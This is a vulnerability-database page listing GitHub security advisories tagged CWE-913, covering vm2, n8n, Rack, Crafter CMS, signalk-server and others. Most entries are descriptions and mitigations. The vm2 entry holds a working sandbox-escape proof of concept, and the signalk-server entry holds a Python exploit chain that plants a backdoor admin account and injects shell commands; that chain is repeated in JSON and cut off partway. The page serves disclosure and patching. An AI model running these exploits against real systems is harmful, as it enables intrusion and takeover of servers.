CWE-913
Allowed-with-ReviewImproper Control of Dynamically-Managed Code Resources
Abstraction: Class · Status: Incomplete
The product does not properly restrict reading from or writing to dynamically-managed code resources such as variables, objects, classes, attributes, functions, or executable instructions or statements.
159 vulnerabilities reference this CWE, most recent first.
GHSA-R5MV-57PH-669Q
Vulnerability from github – Published: 2025-02-06 15:32 – Updated: 2025-02-06 18:31The Lite UI of Apache ShardingSphere ElasticJob-UI allows an attacker to perform RCE by constructing a special JDBC URL of H2 database. This issue affects Apache ShardingSphere ElasticJob-UI version 3.0.1 and prior versions. This vulnerability has been fixed in ElasticJob-UI 3.0.2. The premise of this attack is that the attacker has obtained the account and password. Otherwise, the attacker cannot perform this attack.
{
"affected": [],
"aliases": [
"CVE-2022-31764"
],
"database_specific": {
"cwe_ids": [
"CWE-913"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-02-06T15:15:10Z",
"severity": "HIGH"
},
"details": "The Lite UI of Apache ShardingSphere ElasticJob-UI allows an attacker to perform RCE by constructing a special JDBC URL of H2 database. This issue affects Apache ShardingSphere ElasticJob-UI version 3.0.1 and prior versions. This vulnerability has been fixed in ElasticJob-UI 3.0.2.\nThe premise of this attack is that the attacker has obtained the account and password. Otherwise, the attacker cannot perform this attack.",
"id": "GHSA-r5mv-57ph-669q",
"modified": "2025-02-06T18:31:05Z",
"published": "2025-02-06T15:32:53Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-31764"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread/pg0k223m4hsnnzg4nh7lxvdxxgbkrlqb"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-R657-RXJC-J557
Vulnerability from github – Published: 2025-10-10 17:31 – Updated: 2025-10-13 15:45Summary
A possible information disclosure vulnerability existed in Rack::Sendfile when running behind a proxy that supports x-sendfile headers (such as Nginx). Specially crafted headers could cause Rack::Sendfile to miscommunicate with the proxy and trigger unintended internal requests, potentially bypassing proxy-level access restrictions.
Details
When Rack::Sendfile received untrusted x-sendfile-type or x-accel-mapping headers from a client, it would interpret them as proxy configuration directives. This could cause the middleware to send a "redirect" response to the proxy, prompting it to reissue a new internal request that was not subject to the proxy's access controls.
An attacker could exploit this by:
1. Setting a crafted x-sendfile-type: x-accel-redirect header.
2. Setting a crafted x-accel-mapping header.
3. Requesting a path that qualifies for proxy-based acceleration.
Impact
Attackers could bypass proxy-enforced restrictions and access internal endpoints intended to be protected (such as administrative pages). The vulnerability did not allow arbitrary file reads but could expose sensitive application routes.
This issue only affected systems meeting all of the following conditions:
- The application used
Rack::Sendfilewith a proxy that supportsx-accel-redirect(e.g., Nginx). - The proxy did not always set or remove the
x-sendfile-typeandx-accel-mappingheaders. - The application exposed an endpoint that returned a body responding to
.to_path.
Mitigation
- Upgrade to a fixed version of Rack which requires explicit configuration to enable
x-accel-redirect:
ruby
use Rack::Sendfile, "x-accel-redirect"
- Alternatively, configure the proxy to always set or strip the headers (you should be doing this!):
nginx
proxy_set_header x-sendfile-type x-accel-redirect;
proxy_set_header x-accel-mapping /var/www/=/files/;
- Or in Rails applications, disable sendfile completely:
ruby
config.action_dispatch.x_sendfile_header = nil
{
"affected": [
{
"package": {
"ecosystem": "RubyGems",
"name": "rack"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.2.20"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "RubyGems",
"name": "rack"
},
"ranges": [
{
"events": [
{
"introduced": "3.0"
},
{
"fixed": "3.1.18"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "RubyGems",
"name": "rack"
},
"ranges": [
{
"events": [
{
"introduced": "3.2"
},
{
"fixed": "3.2.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-61780"
],
"database_specific": {
"cwe_ids": [
"CWE-200",
"CWE-441",
"CWE-913"
],
"github_reviewed": true,
"github_reviewed_at": "2025-10-10T17:31:31Z",
"nvd_published_at": "2025-10-10T17:15:39Z",
"severity": "MODERATE"
},
"details": "## Summary\n\nA possible information disclosure vulnerability existed in `Rack::Sendfile` when running behind a proxy that supports `x-sendfile` headers (such as Nginx). Specially crafted headers could cause `Rack::Sendfile` to miscommunicate with the proxy and trigger unintended internal requests, potentially bypassing proxy-level access restrictions.\n\n## Details\n\nWhen `Rack::Sendfile` received untrusted `x-sendfile-type` or `x-accel-mapping` headers from a client, it would interpret them as proxy configuration directives. This could cause the middleware to send a \"redirect\" response to the proxy, prompting it to reissue a new internal request that was **not subject to the proxy\u0027s access controls**.\n\nAn attacker could exploit this by:\n1. Setting a crafted `x-sendfile-type: x-accel-redirect` header.\n2. Setting a crafted `x-accel-mapping` header.\n3. Requesting a path that qualifies for proxy-based acceleration.\n\n## Impact\n\nAttackers could bypass proxy-enforced restrictions and access internal endpoints intended to be protected (such as administrative pages). The vulnerability did not allow arbitrary file reads but could expose sensitive application routes.\n\nThis issue only affected systems meeting all of the following conditions:\n\n* The application used `Rack::Sendfile` with a proxy that supports `x-accel-redirect` (e.g., Nginx).\n* The proxy did **not** always set or remove the `x-sendfile-type` and `x-accel-mapping` headers.\n* The application exposed an endpoint that returned a body responding to `.to_path`.\n\n## Mitigation\n\n* Upgrade to a fixed version of Rack which requires explicit configuration to enable `x-accel-redirect`:\n\n ```ruby\n use Rack::Sendfile, \"x-accel-redirect\"\n ```\n\n* Alternatively, configure the proxy to always set or strip the headers (you should be doing this!):\n\n ```nginx\n proxy_set_header x-sendfile-type x-accel-redirect;\n proxy_set_header x-accel-mapping /var/www/=/files/;\n ```\n\n* Or in Rails applications, disable sendfile completely:\n\n ```ruby\n config.action_dispatch.x_sendfile_header = nil\n ```",
"id": "GHSA-r657-rxjc-j557",
"modified": "2025-10-13T15:45:09Z",
"published": "2025-10-10T17:31:31Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/rack/rack/security/advisories/GHSA-r657-rxjc-j557"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61780"
},
{
"type": "WEB",
"url": "https://github.com/rack/rack/commit/57277b7741581fa827472c5c666f6e6a33abd784"
},
{
"type": "WEB",
"url": "https://github.com/rack/rack/commit/7e69f65eefe9cd2868df9f9f3b0977b86f93523a"
},
{
"type": "WEB",
"url": "https://github.com/rack/rack/commit/fba2c8bc63eb787ff4b19bc612d315fda6126d85"
},
{
"type": "PACKAGE",
"url": "https://github.com/rack/rack"
},
{
"type": "WEB",
"url": "https://github.com/rubysec/ruby-advisory-db/blob/master/gems/rack/CVE-2025-61780.yml"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "Rack has a Possible Information Disclosure Vulnerability"
}
GHSA-R6FX-55X3-F9X6
Vulnerability from github – Published: 2022-05-17 00:00 – Updated: 2023-09-12 13:30Improper Control of Dynamically-Managed Code Resources vulnerability in Crafter Studio of Crafter CMS allows authenticated developers to execute OS commands via FreeMarker static methods.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.craftercms:crafter-studio"
},
"ranges": [
{
"events": [
{
"introduced": "3.1.0"
},
{
"fixed": "3.1.18"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2021-23267"
],
"database_specific": {
"cwe_ids": [
"CWE-913"
],
"github_reviewed": true,
"github_reviewed_at": "2022-06-02T13:44:50Z",
"nvd_published_at": "2022-05-16T17:15:00Z",
"severity": "HIGH"
},
"details": "Improper Control of Dynamically-Managed Code Resources vulnerability in Crafter Studio of Crafter CMS allows authenticated developers to execute OS commands via FreeMarker static methods.",
"id": "GHSA-r6fx-55x3-f9x6",
"modified": "2023-09-12T13:30:02Z",
"published": "2022-05-17T00:00:34Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-23267"
},
{
"type": "WEB",
"url": "https://docs.craftercms.org/en/3.1/security/advisory.html#cv-2022051603"
},
{
"type": "PACKAGE",
"url": "https://github.com/craftercms/studio"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Crafter CMS Crafter Studio vulnerable to Improper Control of Dynamically-Managed Code Resources"
}
GHSA-RC65-2J52-4WCG
Vulnerability from github – Published: 2025-12-05 00:31 – Updated: 2025-12-05 00:31A flaw has been found in youlaitech youlai-mall 1.0.0/2.0.0. Affected is the function getById/updateAddress/deleteAddress of the file /mall-ums/app-api/v1/addresses/. Executing manipulation can lead to improper control of dynamically-identified variables. The attack can be executed remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.
{
"affected": [],
"aliases": [
"CVE-2025-14051"
],
"database_specific": {
"cwe_ids": [
"CWE-913"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-12-04T23:15:46Z",
"severity": "MODERATE"
},
"details": "A flaw has been found in youlaitech youlai-mall 1.0.0/2.0.0. Affected is the function getById/updateAddress/deleteAddress of the file /mall-ums/app-api/v1/addresses/. Executing manipulation can lead to improper control of dynamically-identified variables. The attack can be executed remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.",
"id": "GHSA-rc65-2j52-4wcg",
"modified": "2025-12-05T00:31:06Z",
"published": "2025-12-05T00:31:05Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14051"
},
{
"type": "WEB",
"url": "https://github.com/Hwwg/cve/issues/18"
},
{
"type": "WEB",
"url": "https://github.com/Hwwg/cve/issues/19"
},
{
"type": "WEB",
"url": "https://vuldb.com/?ctiid.334367"
},
{
"type": "WEB",
"url": "https://vuldb.com/?id.334367"
},
{
"type": "WEB",
"url": "https://vuldb.com/?submit.694827"
},
{
"type": "WEB",
"url": "https://vuldb.com/?submit.694836"
},
{
"type": "WEB",
"url": "https://vuldb.com/?submit.694837"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-V5X7-7M6Q-5HVF
Vulnerability from github – Published: 2021-12-03 00:00 – Updated: 2021-12-04 00:01Authenticated administrators may modify the main YAML configuration file and load a Java class resulting in RCE.
{
"affected": [],
"aliases": [
"CVE-2021-23262"
],
"database_specific": {
"cwe_ids": [
"CWE-913"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-12-02T16:15:00Z",
"severity": "HIGH"
},
"details": "Authenticated administrators may modify the main YAML configuration file and load a Java class resulting in RCE.",
"id": "GHSA-v5x7-7m6q-5hvf",
"modified": "2021-12-04T00:01:11Z",
"published": "2021-12-03T00:00:28Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-23262"
},
{
"type": "WEB",
"url": "https://docs.craftercms.org/en/3.1/security/advisory.html#cv-2021120105"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-V6MX-MF47-R5WG
Vulnerability from github – Published: 2026-05-29 17:33 – Updated: 2026-06-12 20:49Summary
By combining Buffer.call.call({}.__lookupGetter__, Buffer, "__proto__"), Buffer.call.call({}.__lookupSetter__, Buffer, "__proto__"), and Node.js's ERR_INVALID_ARG_TYPE Error, the host's TypeError constructor can be obtained, which allows the escape from the sandbox.
This allows attackers to run arbitrary code.
PoC
"use strict";
const { VM } = require("vm2");
const vm = new VM();
vm.run(`
"use strict";
const getProto = Buffer.call.call({}.__lookupGetter__, Buffer, "__proto__");
const setProto = Buffer.call.call({}.__lookupSetter__, Buffer, "__proto__");
async function f() {
try {
await WebAssembly.compileStreaming();
} catch(e) {
setProto.call(getProto.call(e), null);
}
try {
await WebAssembly.compileStreaming();
} catch(e) {
const HostFunction = e.constructor.constructor;
new HostFunction("return process")().mainModule.require("child_process").execSync("echo pwned", { stdio: "inherit" });
}
}
f();
`);
Impact
Sandbox Escape → RCE
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 3.11.3"
},
"package": {
"ecosystem": "npm",
"name": "vm2"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "3.11.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-47131"
],
"database_specific": {
"cwe_ids": [
"CWE-913"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-29T17:33:58Z",
"nvd_published_at": "2026-06-12T15:16:27Z",
"severity": "CRITICAL"
},
"details": "### Summary\nBy combining `Buffer.call.call({}.__lookupGetter__, Buffer, \"__proto__\")`, `Buffer.call.call({}.__lookupSetter__, Buffer, \"__proto__\")`, and Node.js\u0027s `ERR_INVALID_ARG_TYPE` Error, the host\u0027s `TypeError` constructor can be obtained, which allows the escape from the sandbox.\nThis allows attackers to run arbitrary code.\n\n### PoC\n```js\n\"use strict\";\n\nconst { VM } = require(\"vm2\");\nconst vm = new VM();\n\nvm.run(`\n \"use strict\";\n\n const getProto = Buffer.call.call({}.__lookupGetter__, Buffer, \"__proto__\");\n const setProto = Buffer.call.call({}.__lookupSetter__, Buffer, \"__proto__\");\n\n async function f() {\n try {\n await WebAssembly.compileStreaming();\n } catch(e) {\n setProto.call(getProto.call(e), null);\n }\n\n try {\n await WebAssembly.compileStreaming();\n } catch(e) {\n const HostFunction = e.constructor.constructor;\n new HostFunction(\"return process\")().mainModule.require(\"child_process\").execSync(\"echo pwned\", { stdio: \"inherit\" });\n }\n }\n\n f();\n`);\n```\n\n### Impact\nSandbox Escape \u2192 RCE",
"id": "GHSA-v6mx-mf47-r5wg",
"modified": "2026-06-12T20:49:02Z",
"published": "2026-05-29T17:33:58Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-v6mx-mf47-r5wg"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-47131"
},
{
"type": "WEB",
"url": "https://github.com/patriksimek/vm2/commit/27c525f4615e2b983f122e2bed327d810126f5c8"
},
{
"type": "PACKAGE",
"url": "https://github.com/patriksimek/vm2"
},
{
"type": "WEB",
"url": "https://github.com/patriksimek/vm2/releases/tag/v3.11.4"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "vm2 has a Sandbox Escape issue"
}
GHSA-V98V-FF95-F3CP
Vulnerability from github – Published: 2025-12-22 16:19 – Updated: 2026-03-11 20:39Impact
n8n contains a critical Remote Code Execution (RCE) vulnerability in its workflow expression evaluation system. Under certain conditions, expressions supplied by authenticated users during workflow configuration may be evaluated in an execution context that is not sufficiently isolated from the underlying runtime.
An authenticated attacker could abuse this behavior to execute arbitrary code with the privileges of the n8n process. Successful exploitation may lead to full compromise of the affected instance, including unauthorized access to sensitive data, modification of workflows, and execution of system-level operations.
Patches
This issue has been fixed in n8n v1.122.0.
Users are strongly advised to upgrade to version 1.122.0 or later, which introduces additional safeguards to restrict expression evaluation.
Workarounds
If upgrading is not immediately possible, administrators should consider the following temporary mitigations:
- Limit workflow creation and editing permissions to fully trusted users only.
- Deploy n8n in a hardened environment with restricted operating system privileges and network access to reduce the impact of potential exploitation.
These workarounds do not fully eliminate the risk and should only be used as short-term measures.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "n8n"
},
"ranges": [
{
"events": [
{
"introduced": "0.211.0"
},
{
"fixed": "1.120.4"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "n8n"
},
"ranges": [
{
"events": [
{
"introduced": "1.121.0"
},
{
"fixed": "1.121.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-68613"
],
"database_specific": {
"cwe_ids": [
"CWE-913"
],
"github_reviewed": true,
"github_reviewed_at": "2025-12-22T16:19:13Z",
"nvd_published_at": "2025-12-19T23:15:52Z",
"severity": "CRITICAL"
},
"details": "### Impact\nn8n contains a critical Remote Code Execution (RCE) vulnerability in its workflow expression evaluation system. Under certain conditions, expressions supplied by authenticated users during workflow configuration may be evaluated in an execution context that is not sufficiently isolated from the underlying runtime.\n\nAn authenticated attacker could abuse this behavior to execute arbitrary code with the privileges of the n8n process. Successful exploitation may lead to full compromise of the affected instance, including unauthorized access to sensitive data, modification of workflows, and execution of system-level operations.\n\n### Patches\nThis issue has been fixed in n8n v1.122.0.\n\nUsers are strongly advised to upgrade to version 1.122.0 or later, which introduces additional safeguards to restrict expression evaluation.\n\n### Workarounds\nIf upgrading is not immediately possible, administrators should consider the following temporary mitigations:\n\n- Limit workflow creation and editing permissions to fully trusted users only.\n- Deploy n8n in a hardened environment with restricted operating system privileges and network access to reduce the impact of potential exploitation.\n\nThese workarounds do not fully eliminate the risk and should only be used as short-term measures.",
"id": "GHSA-v98v-ff95-f3cp",
"modified": "2026-03-11T20:39:31Z",
"published": "2025-12-22T16:19:13Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/n8n-io/n8n/security/advisories/GHSA-v98v-ff95-f3cp"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68613"
},
{
"type": "WEB",
"url": "https://github.com/n8n-io/n8n/commit/08f332015153decdda3c37ad4fcb9f7ba13a7c79"
},
{
"type": "WEB",
"url": "https://github.com/n8n-io/n8n/commit/1c933358acef527ff61466e53268b41a04be1000"
},
{
"type": "WEB",
"url": "https://github.com/n8n-io/n8n/commit/39a2d1d60edde89674ca96dcbb3eb076ffff6316"
},
{
"type": "PACKAGE",
"url": "https://github.com/n8n-io/n8n"
},
{
"type": "WEB",
"url": "https://www.akamai.com/blog/security-research/2026/feb/zerobot-malware-targets-n8n-automation-platform"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-68613"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "n8n Vulnerable to Remote Code Execution via Expression Injection"
}
GHSA-VWP7-R9VQ-P5WQ
Vulnerability from github – Published: 2026-04-01 03:31 – Updated: 2026-04-01 03:31A vulnerability was identified in z-9527 admin 1.0/2.0. This impacts an unknown function of the file /server/routes/user.js of the component User Update Endpoint. Such manipulation of the argument isAdmin with the input 1 leads to dynamically-determined object attributes. It is possible to launch the attack remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.
{
"affected": [],
"aliases": [
"CVE-2026-5251"
],
"database_specific": {
"cwe_ids": [
"CWE-913"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-04-01T03:15:59Z",
"severity": "MODERATE"
},
"details": "A vulnerability was identified in z-9527 admin 1.0/2.0. This impacts an unknown function of the file /server/routes/user.js of the component User Update Endpoint. Such manipulation of the argument isAdmin with the input 1 leads to dynamically-determined object attributes. It is possible to launch the attack remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.",
"id": "GHSA-vwp7-r9vq-p5wq",
"modified": "2026-04-01T03:31:40Z",
"published": "2026-04-01T03:31:40Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5251"
},
{
"type": "WEB",
"url": "https://github.com/CC-T-454455/Vulnerabilities/tree/master/z9527-admin/vulnerability-11"
},
{
"type": "WEB",
"url": "https://vuldb.com/submit/780607"
},
{
"type": "WEB",
"url": "https://vuldb.com/vuln/354441"
},
{
"type": "WEB",
"url": "https://vuldb.com/vuln/354441/cti"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
GHSA-W3X5-7C4C-66P9
Vulnerability from github – Published: 2026-01-02 15:11 – Updated: 2026-01-02 15:11Summary
An unauthenticated attacker can pollute the internal state (restoreFilePath) of the server via the /skServer/validateBackup endpoint. This allows the attacker to hijack the administrator's "Restore" functionality to overwrite critical server configuration files (e.g., security.json, package.json), leading to account takeover and Remote Code Execution (RCE).
Details
The vulnerability is caused by the use of a module-level global variable restoreFilePath in src/serverroutes.ts, which is shared across all requests.
Vulnerable Code Analysis:
1. Global State: restoreFilePath is defined at the top level of the module.
typescript
// src/serverroutes.ts
let restoreFilePath: string
2. Unauthenticated State Pollution: The /skServer/validateBackup endpoint updates this variable. Crucially, this endpoint lacks authentication middleware, allowing any user to access it.
typescript
app.post(`${SERVERROUTESPREFIX}/validateBackup`, (req, res) => {
// ... handles file upload ...
restoreFilePath = fs.mkdtempSync(...) // Attacker controls this path
})
3. Restore Hijacking: The /skServer/restore endpoint uses the polluted restoreFilePath to perform the restoration.
typescript
app.post(`${SERVERROUTESPREFIX}/restore`, (req, res) => {
// ...
const unzipStream = unzipper.Extract({ path: restoreFilePath }) // Uses polluted path
// ...
})
Exploit Chain:
1. Pollution: Attacker uploads a malicious zip file to /validateBackup. The server saves it and updates restoreFilePath to point to this malicious file.
2. Hijacking: When /restore is triggered (either by the attacker if they have access, or by a legitimate admin), the server restores the attacker's malicious files.
3. Backdoor: The attacker overwrites security.json to add a new administrator account.
4. RCE: Using the new admin account, the attacker exploits a separate Command Injection vulnerability in the App Store (/skServer/appstore/install/...) to execute arbitrary system commands (e.g., npm install injection).
PoC
Here is a complete Python script to reproduce the full exploit chain.
import requests
import zipfile
import io
import json
import time
# Configuration
TARGET_URL = "http://localhost:3000"
BACKDOOR_USER = "hacker"
BACKDOOR_PASS = "hacked1234"
def step1_plant_backdoor():
print("[*] Step 1: Planting Backdoor via State Pollution...")
# 1. Create malicious zip with security.json
zip_buffer = io.BytesIO()
with zipfile.ZipFile(zip_buffer, 'w') as z:
# Add backdoor admin user
security_config = {
"users": [{
"username": BACKDOOR_USER,
"password": BACKDOOR_PASS,
"permissions": "admin"
}]
}
z.writestr("security.json", json.dumps(security_config))
# Enable security to make the backdoor effective
z.writestr("settings.json", json.dumps({"security": {"strategy": "./tokensecurity"}}))
zip_buffer.seek(0)
# 2. Pollute State (Unauthenticated)
print(" [+] Sending malicious backup to /validateBackup...")
res = requests.post(f"{TARGET_URL}/skServer/validateBackup",
files={'file': ('malicious.zip', zip_buffer, 'application/zip')})
if res.status_code != 200:
print(" [-] Failed to pollute state.")
return False
# 3. Trigger Restore (Hijacking)
print(" [+] Triggering restore to overwrite server config...")
# Note: In a real attack, if /restore is protected, attacker waits for admin to use it.
# Here we assume we can trigger it or security is currently off.
res = requests.post(f"{TARGET_URL}/skServer/restore", json={"security.json": True, "settings.json": True})
if res.status_code in [200, 202]:
print(" [+] Restore triggered successfully. Backdoor planted.")
print(" [!] PLEASE RESTART THE SERVER to load the new configuration.")
return True
else:
print(f" [-] Restore failed: {res.status_code} {res.text}")
return False
def step2_execute_rce():
print("\n[*] Step 2: Executing RCE as Backdoor User...")
# 1. Login
session = requests.Session()
login_payload = {"username": BACKDOOR_USER, "password": BACKDOOR_PASS}
res = session.post(f"{TARGET_URL}/signalk/v1/auth/login", json=login_payload)
if res.status_code != 200:
print(" [-] Login failed. Did you restart the server?")
return
token = res.json()['token']
print(" [+] Login successful. Authenticated as Admin.")
# 2. RCE Payload (Windows Example)
# Injecting command into version parameter of npm install
# Command: echo RCE_SUCCESS > rce_proof.txt
cmd_payload = "1.0.0 & echo RCE_SUCCESS > rce_proof.txt &"
# We need a valid package name to bypass existence check
package_name = "@signalk/freeboard-sk"
print(f" [+] Sending RCE payload: {cmd_payload}")
headers = {'Authorization': f'Bearer {token}'}
try:
session.post(f"{TARGET_URL}/skServer/appstore/install/{package_name}/{cmd_payload}",
headers=headers, timeout=5)
except:
pass # Timeout is expected as the command might hang or take time
print(" [+] Payload sent. Check for 'rce_proof.txt' in server root.")
if __name__ == "__main__":
# Run Step 1, then restart server manually, then Run Step 2
# step1_plant_backdoor()
step2_execute_rce()
Impact
Remote Code Execution (RCE), Account Takeover, Denial of Service.
Verified: RCE is demonstrated by creating a file named rce_proof.txt containing the text "RCE_SUCCESS" on the server filesystem using the exploit chain.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "signalk-server"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "2.19.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-66398"
],
"database_specific": {
"cwe_ids": [
"CWE-78",
"CWE-913"
],
"github_reviewed": true,
"github_reviewed_at": "2026-01-02T15:11:49Z",
"nvd_published_at": "2026-01-01T18:15:40Z",
"severity": "CRITICAL"
},
"details": "### Summary\nAn unauthenticated attacker can pollute the internal state (`restoreFilePath`) of the server via the `/skServer/validateBackup` endpoint. This allows the attacker to hijack the administrator\u0027s \"Restore\" functionality to overwrite critical server configuration files (e.g., `security.json`, `package.json`), leading to account takeover and Remote Code Execution (RCE).\n\n### Details\nThe vulnerability is caused by the use of a module-level global variable `restoreFilePath` in `src/serverroutes.ts`, which is shared across all requests.\n\n**Vulnerable Code Analysis:**\n1. **Global State**: `restoreFilePath` is defined at the top level of the module.\n ```typescript\n // src/serverroutes.ts\n let restoreFilePath: string\n ```\n2. **Unauthenticated State Pollution**: The `/skServer/validateBackup` endpoint updates this variable. Crucially, this endpoint **lacks authentication middleware**, allowing any user to access it.\n ```typescript\n app.post(`${SERVERROUTESPREFIX}/validateBackup`, (req, res) =\u003e {\n // ... handles file upload ...\n restoreFilePath = fs.mkdtempSync(...) // Attacker controls this path\n })\n ```\n3. **Restore Hijacking**: The `/skServer/restore` endpoint uses the polluted `restoreFilePath` to perform the restoration.\n ```typescript\n app.post(`${SERVERROUTESPREFIX}/restore`, (req, res) =\u003e {\n // ...\n const unzipStream = unzipper.Extract({ path: restoreFilePath }) // Uses polluted path\n // ...\n })\n ```\n\n**Exploit Chain:**\n1. **Pollution**: Attacker uploads a malicious zip file to `/validateBackup`. The server saves it and updates `restoreFilePath` to point to this malicious file.\n2. **Hijacking**: When `/restore` is triggered (either by the attacker if they have access, or by a legitimate admin), the server restores the attacker\u0027s malicious files.\n3. **Backdoor**: The attacker overwrites `security.json` to add a new administrator account.\n4. **RCE**: Using the new admin account, the attacker exploits a separate Command Injection vulnerability in the App Store (`/skServer/appstore/install/...`) to execute arbitrary system commands (e.g., `npm install` injection).\n\n### PoC\nHere is a complete Python script to reproduce the full exploit chain.\n\n```python\nimport requests\nimport zipfile\nimport io\nimport json\nimport time\n\n# Configuration\nTARGET_URL = \"http://localhost:3000\"\nBACKDOOR_USER = \"hacker\"\nBACKDOOR_PASS = \"hacked1234\"\n\ndef step1_plant_backdoor():\n print(\"[*] Step 1: Planting Backdoor via State Pollution...\")\n \n # 1. Create malicious zip with security.json\n zip_buffer = io.BytesIO()\n with zipfile.ZipFile(zip_buffer, \u0027w\u0027) as z:\n # Add backdoor admin user\n security_config = {\n \"users\": [{\n \"username\": BACKDOOR_USER,\n \"password\": BACKDOOR_PASS, \n \"permissions\": \"admin\"\n }]\n }\n z.writestr(\"security.json\", json.dumps(security_config))\n # Enable security to make the backdoor effective\n z.writestr(\"settings.json\", json.dumps({\"security\": {\"strategy\": \"./tokensecurity\"}}))\n zip_buffer.seek(0)\n\n # 2. Pollute State (Unauthenticated)\n print(\" [+] Sending malicious backup to /validateBackup...\")\n res = requests.post(f\"{TARGET_URL}/skServer/validateBackup\", \n files={\u0027file\u0027: (\u0027malicious.zip\u0027, zip_buffer, \u0027application/zip\u0027)})\n if res.status_code != 200:\n print(\" [-] Failed to pollute state.\")\n return False\n\n # 3. Trigger Restore (Hijacking)\n print(\" [+] Triggering restore to overwrite server config...\")\n # Note: In a real attack, if /restore is protected, attacker waits for admin to use it.\n # Here we assume we can trigger it or security is currently off.\n res = requests.post(f\"{TARGET_URL}/skServer/restore\", json={\"security.json\": True, \"settings.json\": True})\n \n if res.status_code in [200, 202]:\n print(\" [+] Restore triggered successfully. Backdoor planted.\")\n print(\" [!] PLEASE RESTART THE SERVER to load the new configuration.\")\n return True\n else:\n print(f\" [-] Restore failed: {res.status_code} {res.text}\")\n return False\n\ndef step2_execute_rce():\n print(\"\\n[*] Step 2: Executing RCE as Backdoor User...\")\n \n # 1. Login\n session = requests.Session()\n login_payload = {\"username\": BACKDOOR_USER, \"password\": BACKDOOR_PASS}\n res = session.post(f\"{TARGET_URL}/signalk/v1/auth/login\", json=login_payload)\n \n if res.status_code != 200:\n print(\" [-] Login failed. Did you restart the server?\")\n return\n \n 